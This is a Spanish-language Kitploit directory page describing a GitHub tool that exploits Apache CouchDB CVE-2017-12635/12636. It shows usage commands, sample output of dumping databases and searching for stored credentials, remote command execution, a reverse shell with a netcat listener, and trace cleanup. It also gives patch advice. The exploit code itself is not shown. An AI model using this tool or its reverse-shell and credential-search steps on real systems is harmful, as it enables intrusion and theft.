Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
couchdb-exploit — Explota CouchDB CVE-2017-12635/12636 para escalada de privilegios y RCE, y luego proporciona una shell interactiva con ejecución de comandos, navegación de bases de datos y reverse shell. | Kitploit
Herramientas/GitHubGitHub/darabium/couchdb-exploit
Escalada de PrivilegiosExplotaciónRecopilación de InformaciónPost-ExplotaciónPruebas de PenetraciónRed TeamingHerramienta de Acceso Remoto
GitHubdarabium/couchdb-exploit

couchdb-exploit

Explota CouchDB CVE-2017-12635/12636 para escalada de privilegios y RCE, y luego proporciona una shell interactiva con ejecución de comandos, navegación de bases de datos y reverse shell.

Ver Repositorio
hace 18 díasAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🚀 Exploit de CouchDB - CVE-2017-12635 y CVE-2017-12636

Python License CVE CVE

Apache CouchDB - Escalada de privilegios y ejecución remota de código

GitHub stars GitHub forks


📖 Resumen

Esta herramienta explota dos vulnerabilidades críticas en Apache CouchDB:

CVEDescripciónGravedad
CVE-2017-12635Escalada de privilegios mediante bypass del análisis JSON🔴 Crítica
CVE-2017-12636Ejecución remota de código a través del Query Server🔴 Crítica

Cómo funciona

  1. CVE-2017-12635: Explota el análisis JSON inconsistente entre los analizadores de Erlang y JavaScript para crear un usuario administrador
  2. CVE-2017-12636: Utiliza el acceso de administrador para configurar un Query Server malicioso y ejecutar comandos del sistema

🎯 Versiones Vulnerables

Comprobación Rápida

curl http://target:5984/

If version is 1.x.x or 2.0.x/2.1.0 → VULNERABLE

✨ Características

root@kitploit:~
✅ Explotación automática - Un comando para gobernarlos a todos
✅ Shell interactiva - Interfaz de comandos fácil de usar
✅ Visor de bases de datos - Navega por todas las bases de datos y documentos
✅ Visualización JSON completa - Ve el contenido completo de los documentos
✅ Búsqueda global - Busca palabras clave en todas las bases de datos
✅ Comandos del sistema - Ejecuta comandos arbitrarios en el objetivo
✅ Reverse Shell - Obtén una shell interactiva completa
✅ Historial de comandos - Mantén un registro de tus acciones
✅ Limpieza automática - Elimina rastros después de la explotación
✅ Salida a color - Fácil de leer y entender

📦 Instalación Requisitos previos bash

Python 3.6+ required

python3 --version

Clonar e instalar bash

Clone the repository

git clone https://github.com/darabium/couchdb-exploit.git cd couchdb-exploit

Install dependencies

pip install -r requirements.txt

Requisitos txt

requests>=2.25.0 urllib3>=1.26.0

🚀 Uso Uso básico bash

Simple exploit

python3 couchdb-exploit.py -t <TARGET_IP> -p

Example

python3 couchdb-exploit.py -t 192.168.1.100 -p 5984

Opciones de la línea de comandos bash

python3 couchdb-exploit.py -h

usage: couchdb-exploit.py [-h] -t TARGET [-p PORT]

arguments: -h, --help show this help message and exit -t TARGET, --target TARGET Target IP address or hostname -p PORT, --port PORT Target port (default: 5984)

💻 Comandos

📊 Ejemplos

  1. Listar todas las bases de datos bash

couchdb> db

[+] 39 databases:

  1. _replicator (0 docs)

  2. _users (12 docs)

  3. admin (5 docs)

  4. passwords (25 docs)

  5. core-configuration (8 docs) ...

  6. Ver el contenido de una base de datos bash

couchdb> view passwords

[+] Viewing database: passwords

[*] Total documents: 25

📄 Document #1 ID: user_admin Full content: { "_id": "user_admin", "username": "admin", "password": "Admin123!", "email": "[email protected]", "role": "superadmin" }

  1. Buscar credenciales bash

couchdb> search password

[+] Searching for 'password' in all databases...

✅ Found in 'passwords' ID: user1 Content: { "username": "root", "password": "rootpass123" }

✅ Found in 'config' ID: app_settings Content: { "db_password": "secret123", "api_key": "sk_live_abc123" }

  1. Ejecutar comandos del sistema bash

couchdb> exec whoami [+] Executing: whoami [+] Command executed!

couchdb> exec id [+] Executing: id [+] Command executed!

  1. Reverse Shell bash

On your machine (listener)

nc -lvnp 4444

In the exploit

couchdb> reverse 10.0.0.1 4444 [+] Setting up reverse shell to 10.0.0.1:4444 [!] Make sure listener is running: nc -lvnp 4444 [?] Continue? (y/n): y [+] Reverse shell triggered!

You should get a shell on your listener!

🖼️ Capturas de pantalla Exploit en acción

https://via.placeholder.com/800x400?text=Exploit+Demo+Screenshot

Vista de base de datos

https://via.placeholder.com/800x400?text=Database+View

Reverse Shell

https://via.placeholder.com/800x400?text=Reverse+Shell

⚠️ Descargo de responsabilidad

root@kitploit:~
IMPORTANTE: Esta herramienta es solo para fines educativos y de pruebas autorizadas.

    🚫 No la uses en sistemas sin permiso explícito

    🚫 El autor no es responsable de ningún uso indebido

    🚫 Úsala solo en entornos controlados o en tus propios sistemas

    ✅ Obtén siempre autorización por escrito antes de realizar pruebas

    ✅ Sigue prácticas de divulgación responsable

Al usar esta herramienta, aceptas estos términos.

🔐 Consejos de seguridad

Si eres administrador de sistemas:

root@kitploit:~
Actualiza inmediatamente a CouchDB ≥ 1.7.0 o ≥ 2.1.1

Usa un firewall para restringir el acceso al puerto 5984

Habilita la autenticación y usa contraseñas seguras

Supervisa los registros para detectar actividad sospechosa

Realiza auditorías de seguridad periódicas de tu infraestructura

Solución rápida bash

Upgrade CouchDB

sudo apt-get update sudo apt-get install couchdb=2.1.1 # Or latest version

Restrict access

sudo ufw allow from 192.168.1.0/24 to any port 5984

📚 Referencias

root@kitploit:~
CVE-2017-12635 - NVD

CVE-2017-12636 - NVD

Apache CouchDB Security

Exploit-DB

👤 Autor

darabium

root@kitploit:~
GitHub: @darabium

Telegram: @darabium

⭐ Soporte

Si te resulta útil:

root@kitploit:~
⭐ Marca el repositorio con una estrella

🐛 Reporta problemas

🔧 Contribuye con mejoras

📢 Compártelo con otros

📄 Licencia

Este proyecto está licenciado bajo la Licencia MIT; consulta el archivo LICENSE para más detalles.

Hecho con ❤️ para la investigación en seguridad

⬆ Volver arriba

Descargar herramienta
VersiónVulnerableVersión Corregida
Apache CouchDB < 1.7.0✅ Sí1.7.0
Apache CouchDB 1.x.x✅ Sí1.7.0
Apache CouchDB 2.0.0✅ Sí2.1.1
Apache CouchDB 2.1.0✅ Sí2.1.1
Apache CouchDB ≥ 2.1.1❌ No-
ComandoDescripciónEjemplo
dbMuestra todas las bases de datos con contador de documentosdb
view Ver TODOS los documentos de una base de datos (JSON completo)view passwords
raw Muestra la respuesta cruda del servidorraw admin
count Cuenta documentos en una base de datoscount users
search Busca una palabra clave en TODAS las bases de datossearch admin
exec Ejecuta un comando del sistemaexec whoami
reverse Configura una reverse shellreverse 10.0.0.1 4444
historyMuestra el historial de comandoshistory
helpMuestra este menúhelp
exitSalir con limpiezaexit